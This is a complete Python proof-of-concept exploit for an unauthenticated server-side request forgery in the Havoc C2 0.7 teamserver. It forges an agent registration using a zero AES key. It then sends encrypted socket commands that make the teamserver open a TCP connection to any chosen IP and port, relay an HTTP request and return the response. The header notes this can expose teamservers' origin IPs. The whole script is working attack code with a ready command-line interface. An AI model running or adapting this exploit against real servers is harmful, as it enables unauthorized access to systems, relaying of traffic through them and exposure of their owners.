# Authored by chebuya
#
# Havoc C2 version 0.7 suffers from an unauthenticated server-side request forgery vulnerability.

# Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
# Date: 2024-07-13
# Exploit Author: @_chebuya
# Software Link: https://github.com/HavocFramework/Havoc
# Version: v0.7
# Tested on: Ubuntu 20.04 LTS
# CVE: ?
# Description: This exploit spoofs a demon agent registration and subsequent check-ins to make the teamserver open a TCP socket, and then reads and writes data through it. This allows attackers to leak the origin IPs of teamservers and much more.
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
import binascii
import random
import requests
import argparse
import urllib3
urllib3.disable_warnings()


from Crypto.Cipher import AES
from Crypto.Util import Counter

# AES key length in bytes (32 bytes selects AES-256). encrypt() and decrypt()
# pad shorter keys up to this length and assert on it.
key_bytes = 32

def decrypt(key, iv, ciphertext):
    """Decrypt ``ciphertext`` with AES in CTR mode and return the plaintext.

    A ``key`` shorter than ``key_bytes`` is right-padded with ASCII ``b"0"``
    up to ``key_bytes`` bytes. ``iv`` is read as a big-endian hexadecimal
    integer and used as the initial value of the counter, whose width is the
    AES block size in bits.
    """
    # ljust() leaves keys that are already long enough untouched, so an
    # over-long key still trips the assertion below.
    padded_key = key.ljust(key_bytes, b"0")
    assert len(padded_key) == key_bytes

    counter = Counter.new(
        AES.block_size * 8,
        initial_value=int(binascii.hexlify(iv), 16),
    )
    cipher = AES.new(padded_key, AES.MODE_CTR, counter=counter)
    return cipher.decrypt(ciphertext)


def int_to_bytes(value, length=4, byteorder="big"):
    """Serialize the integer ``value`` into ``length`` bytes.

    ``byteorder`` is ``"big"`` (the default) or ``"little"``. Raises
    ``OverflowError`` when ``value`` does not fit into ``length`` bytes.
    """
    encoded = value.to_bytes(length=length, byteorder=byteorder)
    return encoded


def encrypt(key, iv, plaintext):
    """Encrypt ``plaintext`` with AES in CTR mode and return the ciphertext.

    A ``key`` shorter than ``key_bytes`` is right-padded with ASCII ``b"0"``
    up to ``key_bytes`` bytes. ``iv`` is read as a big-endian hexadecimal
    integer and used as the initial value of the counter.
    """
    missing = key_bytes - len(key)
    if missing > 0:
        key = key + b"0" * missing

    assert len(key) == key_bytes

    start_value = int(binascii.hexlify(iv), 16)
    counter_bits = AES.block_size * 8
    cipher = AES.new(
        key,
        AES.MODE_CTR,
        counter=Counter.new(counter_bits, initial_value=start_value),
    )
    return cipher.encrypt(plaintext)

def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
    """POST a spoofed agent registration (DEMON_INITIALIZE) to the listener.

    Every argument is a ``bytes`` value that is concatenated verbatim into the
    request body; the string fields are each preceded by a 4-byte big-endian
    length. The request also carries the module-level ``AES_Key``, ``AES_IV``
    and ``agent_id``, and is sent to ``teamserver_listener_url`` with the
    module-level ``headers``. The outcome is only printed; nothing is returned.
    """
    # DEMON_INITIALIZE / 99
    command = b"\x00\x00\x00\x63"
    request_id = b"\x00\x00\x00\x01"

    # The advertised process-name length is deliberately 6 bytes shorter than
    # the encoded name, exactly as in the original PoC.
    process_name_length = int_to_bytes(len(process_name) - 6)

    # 100 filler bytes appended after the fields built above.
    filler = b"\xab" * 100

    header_data = b"".join([
        command,
        request_id,
        AES_Key,
        AES_IV,
        agent_id,
        int_to_bytes(len(hostname)), hostname,
        int_to_bytes(len(username)), username,
        int_to_bytes(len(domain_name)), domain_name,
        int_to_bytes(len(internal_ip)), internal_ip,
        process_name_length, process_name,
        process_id,
        filler,
    ])

    # The size field is the payload length plus 12.
    size = 12 + len(header_data)
    agent_header = size.to_bytes(4, "big") + magic + agent_id

    print("[***] Trying to register agent...")
    r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")


def open_socket(socket_id, target_address, target_port):
    """POST a COMMAND_SOCKET / SOCKET_COMMAND_OPEN request to the listener.

    ``socket_id`` is a ``bytes`` identifier placed verbatim in the package.
    ``target_address`` is a dotted IPv4 string and ``target_port`` an integer.
    The package is encrypted with the module-level ``AES_Key`` / ``AES_IV``.
    The outcome is only printed; nothing is returned.
    """
    # COMMAND_SOCKET / 2540
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x02"

    # SOCKET_COMMAND_OPEN / 16
    subcommand = b"\x00\x00\x00\x10"

    # Placeholder local endpoint values.
    local_addr = b"\x22\x22\x22\x22"
    local_port = b"\x33\x33\x33\x33"

    # The address is sent one byte per octet, in reversed octet order.
    forward_addr = b"".join(
        int_to_bytes(int(octet), length=1)
        for octet in reversed(target_address.split("."))
    )
    forward_port = int_to_bytes(target_port)

    package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
    # The length prefix counts the package plus 4 bytes.
    package_size = int_to_bytes(len(package) + 4)

    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

    size = 12 + len(header_data)
    agent_header = size.to_bytes(4, "big") + magic + agent_id
    data = agent_header + header_data

    print("[***] Trying to open socket on the teamserver...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")

def write_socket(socket_id, data):
    """POST a COMMAND_SOCKET request carrying ``data`` for ``socket_id``.

    ``socket_id`` and ``data`` are ``bytes``. ``data`` is prefixed with its
    4-byte big-endian length and the package is encrypted with the
    module-level ``AES_Key`` / ``AES_IV``. The outcome is only printed;
    nothing is returned.
    """
    # COMMAND_SOCKET / 2540
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x08"

    # SOCKET_COMMAND_READ (0x11)
    subcommand = b"\x00\x00\x00\x11"

    # SOCKET_TYPE_CLIENT / 3
    socket_type = b"\x00\x00\x00\x03"
    success = b"\x00\x00\x00\x01"

    data_length = int_to_bytes(len(data))

    package = subcommand + socket_id + socket_type + success + data_length + data
    # The length prefix counts the package plus 4 bytes.
    package_size = int_to_bytes(len(package) + 4)

    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

    size = 12 + len(header_data)
    agent_header = size.to_bytes(4, "big") + magic + agent_id
    post_data = agent_header + header_data

    print("[***] Trying to write to the socket")
    r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")


def read_socket(socket_id):
    """Poll the listener with COMMAND_GET_JOB and return the decrypted output.

    ``socket_id`` is accepted for symmetry with the other socket helpers but
    is not part of the request. Returns ``bytes``: the decrypted response
    payload with its first 12 bytes removed, or ``b""`` when the listener
    does not answer with HTTP 200.
    """
    # COMMAND_GET_JOB / 1
    command = b"\x00\x00\x00\x01"
    request_id = b"\x00\x00\x00\x09"

    header_data = command + request_id

    size = 12 + len(header_data)
    agent_header = size.to_bytes(4, "big") + magic + agent_id
    data = agent_header + header_data

    print("[***] Trying to poll teamserver for socket output...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code != 200:
        print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
        # Return bytes, not str, so callers can always call .decode().
        return b""

    print("[***] Read socket output successfully!")

    # The first 12 bytes of the response are sent in the clear (the original
    # PoC read them as three little-endian 32-bit fields: command id,
    # request id and package size); only the remainder is encrypted.
    enc_package = r.content[12:]

    # The leading 12 bytes of the decrypted package are dropped as well --
    # presumably package metadata preceding the socket data; TODO confirm.
    return decrypt(AES_Key, AES_IV, enc_package)[12:]



# Command-line interface: the listener URL plus the address the teamserver
# should be made to connect to; the remaining options describe the spoofed agent.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent header to send to the listener", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")

args = parser.parse_args()


# Module-level state read by the request helpers defined above.
# 0xDEADBEEF
magic = b"\xde\xad\xbe\xef"
teamserver_listener_url = args.target
headers = {
    "User-Agent": args.user_agent
}
agent_id = int_to_bytes(random.randint(100000, 1000000))
# All-zero key and IV, sent to the listener as part of the registration.
AES_Key = b"\x00" * 32
AES_IV = b"\x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
# Unlike the other fields, the process name is encoded as UTF-16LE.
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))

register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)

socket_id = b"\x11\x11\x11\x11"
open_socket(socket_id, args.ip, int(args.port))

request_data = b"GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"
write_socket(socket_id, request_data)
# The response may not be valid UTF-8; replace undecodable bytes rather than crash.
print(read_socket(socket_id).decode(errors="replace"))